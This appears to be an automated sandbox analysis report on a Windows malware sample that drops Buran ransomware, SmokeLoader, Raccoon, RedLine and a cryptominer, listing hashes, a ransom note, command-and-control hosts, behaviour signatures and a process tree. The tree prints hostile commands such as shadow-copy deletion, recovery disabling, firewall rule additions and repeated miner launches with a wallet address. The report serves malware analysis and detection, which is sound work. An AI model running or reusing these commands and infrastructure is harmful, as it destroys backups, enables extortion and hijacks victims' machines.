Analysis

  • max time kernel
    153s
  • max time network
    155s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    14-08-2021 22:30

General

  • Target

    ab66db0680bb17229bb5f58cce60819b.exe

  • Size

    271KB

  • MD5

    ab66db0680bb17229bb5f58cce60819b

  • SHA1

    0475f981560b705b59842cf81475f07eac2b5b68

  • SHA256

    a0039d484f3134cad7e173c2bee0e089982b881711d99e19d61229b4854e02a5

  • SHA512

    38a7502e643772dd1d1f793a5ca9ddd39146dd836f328a7413bb61effe5ab6d5e68accbdc2df979186a58870bb9cf45afe75708ce0d00ef1a5288a85d8dd5e4c

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 500$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: payfast290@mail2tor.com and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? payfast290@mail2tor.com TELEGRAM @ payfast290 Your personal ID: 503-5E6-BF6 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

@JABKA9983

C2

51.89.92.99:5965

Extracted

Family

redline

Botnet

123

C2

95.179.166.29:60101

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes
  • url4cnc

    https://telete.in/p1rosto100xx

rc4.plain
rc4.plain

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 60 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 7 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab66db0680bb17229bb5f58cce60819b.exe
    "C:\Users\Admin\AppData\Local\Temp\ab66db0680bb17229bb5f58cce60819b.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:912
    • C:\Users\Admin\AppData\Local\Temp\ab66db0680bb17229bb5f58cce60819b.exe
      "C:\Users\Admin\AppData\Local\Temp\ab66db0680bb17229bb5f58cce60819b.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3892
  • C:\Users\Admin\AppData\Local\Temp\8C43.exe
    C:\Users\Admin\AppData\Local\Temp\8C43.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:1132
  • C:\Users\Admin\AppData\Local\Temp\90D8.exe
    C:\Users\Admin\AppData\Local\Temp\90D8.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    PID:2052
    • C:\Users\Admin\AppData\Local\Temp\90D8.exe
      C:\Users\Admin\AppData\Local\Temp\90D8.exe
      2⤵
        PID:4504
      • C:\Users\Admin\AppData\Local\Temp\90D8.exe
        C:\Users\Admin\AppData\Local\Temp\90D8.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:4516
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 1448
          3⤵
          • Program crash
          • Suspicious use of AdjustPrivilegeToken
          PID:4680
    • C:\Users\Admin\AppData\Local\Temp\953E.exe
      C:\Users\Admin\AppData\Local\Temp\953E.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3864
      • C:\Users\Admin\AppData\Local\Temp\hhhhhhhhhhh.exe
        C:\Users\Admin\AppData\Local\Temp\hhhhhhhhhhh.exe
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Adds Run key to start application
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:804
        • C:\Users\Admin\Windows Application Manager\winappmgr.exe
          "C:\Users\Admin\Windows Application Manager\winappmgr.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: AddClipboardFormatListener
          PID:3256
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\admin\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\admin\windows application manager\winappmgr.exe" program="C:\Users\Admin\Windows Application Manager\winappmgr.exe"
            4⤵
              PID:4016
              • C:\Windows\SysWOW64\netsh.exe
                netsh advfirewall firewall show rule name="c:\users\admin\windows application manager\winappmgr.exe"
                5⤵
                  PID:4224
                • C:\Windows\SysWOW64\netsh.exe
                  netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\admin\windows application manager\winappmgr.exe" program="C:\Users\Admin\Windows Application Manager\winappmgr.exe"
                  5⤵
                    PID:4404
          • C:\Users\Admin\AppData\Local\Temp\96D5.exe
            C:\Users\Admin\AppData\Local\Temp\96D5.exe
            1⤵
            • Executes dropped EXE
            PID:3956
          • C:\Users\Admin\AppData\Local\Temp\9A70.exe
            C:\Users\Admin\AppData\Local\Temp\9A70.exe
            1⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4044
            • C:\Users\Admin\AppData\Local\Temp\9A70.exe
              C:\Users\Admin\AppData\Local\Temp\9A70.exe
              2⤵
              • Executes dropped EXE
              PID:1568
            • C:\Users\Admin\AppData\Local\Temp\9A70.exe
              C:\Users\Admin\AppData\Local\Temp\9A70.exe
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:400
              • C:\Users\Admin\AppData\Local\Temp\AudioService.exe
                "C:\Users\Admin\AppData\Local\Temp\AudioService.exe"
                3⤵
                • Executes dropped EXE
                PID:4824
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 4824 -s 1060
                  4⤵
                  • Program crash
                  PID:4476
          • C:\Users\Admin\AppData\Local\Temp\9F34.exe
            C:\Users\Admin\AppData\Local\Temp\9F34.exe
            1⤵
            • Executes dropped EXE
            • Checks BIOS information in registry
            • Loads dropped DLL
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Checks processor information in registry
            • Modifies system certificate store
            PID:3156
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im 9F34.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9F34.exe" & del C:\ProgramData\*.dll & exit
              2⤵
                PID:3148
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im 9F34.exe /f
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2416
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 6
                  3⤵
                  • Delays execution with timeout.exe
                  PID:4300
            • C:\Users\Admin\AppData\Local\Temp\A280.exe
              C:\Users\Admin\AppData\Local\Temp\A280.exe
              1⤵
              • Executes dropped EXE
              PID:1116
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 736
                2⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:3840
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 748
                2⤵
                • Program crash
                PID:2100
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 848
                2⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:1680
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 868
                2⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:3728
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 832
                2⤵
                • Suspicious use of NtCreateProcessExOtherParentProcess
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:1820
            • C:\Users\Admin\AppData\Local\Temp\AC65.exe
              C:\Users\Admin\AppData\Local\Temp\AC65.exe
              1⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              PID:3592
            • C:\Users\Admin\AppData\Local\Temp\AE89.exe
              C:\Users\Admin\AppData\Local\Temp\AE89.exe
              1⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:528
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe
                "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -start
                2⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Suspicious use of AdjustPrivilegeToken
                PID:2100
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                  3⤵
                    PID:5032
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic shadowcopy delete
                      4⤵
                        PID:4248
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                      3⤵
                        PID:5044
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                        3⤵
                          PID:5064
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                          3⤵
                            PID:5092
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                            3⤵
                              PID:1540
                              • C:\Windows\SysWOW64\vssadmin.exe
                                vssadmin delete shadows /all /quiet
                                4⤵
                                • Interacts with shadow copies
                                PID:4432
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                              3⤵
                                PID:3868
                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                  wmic shadowcopy delete
                                  4⤵
                                    PID:4472
                                  • C:\Windows\SysWOW64\vssadmin.exe
                                    vssadmin delete shadows /all /quiet
                                    4⤵
                                    • Interacts with shadow copies
                                    PID:4608
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe
                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -agent 0
                                  3⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  PID:2392
                              • C:\Windows\SysWOW64\notepad.exe
                                notepad.exe
                                2⤵
                                  PID:2188
                              • C:\Users\Admin\AppData\Local\Temp\B58E.exe
                                C:\Users\Admin\AppData\Local\Temp\B58E.exe
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2856
                              • C:\Users\Admin\AppData\Local\Temp\B90A.exe
                                C:\Users\Admin\AppData\Local\Temp\B90A.exe
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:1548
                                • C:\Users\Admin\AppData\Local\Temp\B90A.exe
                                  C:\Users\Admin\AppData\Local\Temp\B90A.exe
                                  2⤵
                                    PID:4908
                                  • C:\Users\Admin\AppData\Local\Temp\B90A.exe
                                    C:\Users\Admin\AppData\Local\Temp\B90A.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Drops startup file
                                    PID:4916
                                    • C:\ProgramData\Data\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -fanmin 30 -fanmax 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:720
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:2884
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4788
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:1796
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4076
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4496
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:3188
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:3116
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:344
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      PID:656
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:3780
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4552
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4800
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:640
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4924
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4884
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:1548
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:5020
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:5072
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4160
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4264
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4384
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4260
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:2000
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:5108
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4292
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4448
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:2184
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4452
                                    • C:\ProgramData\Systemd\pigeon.exe
                                      -epool eth.2miners.com:2020 -ewal 0x155de5c1ae8ceb16349e115e43e07da84129f4b7 -worker Worker -epsw x -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 85 -tstart 60 -coin eth
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:1128
                                    • C:\ProgramData\Systemd\pigeon.exe
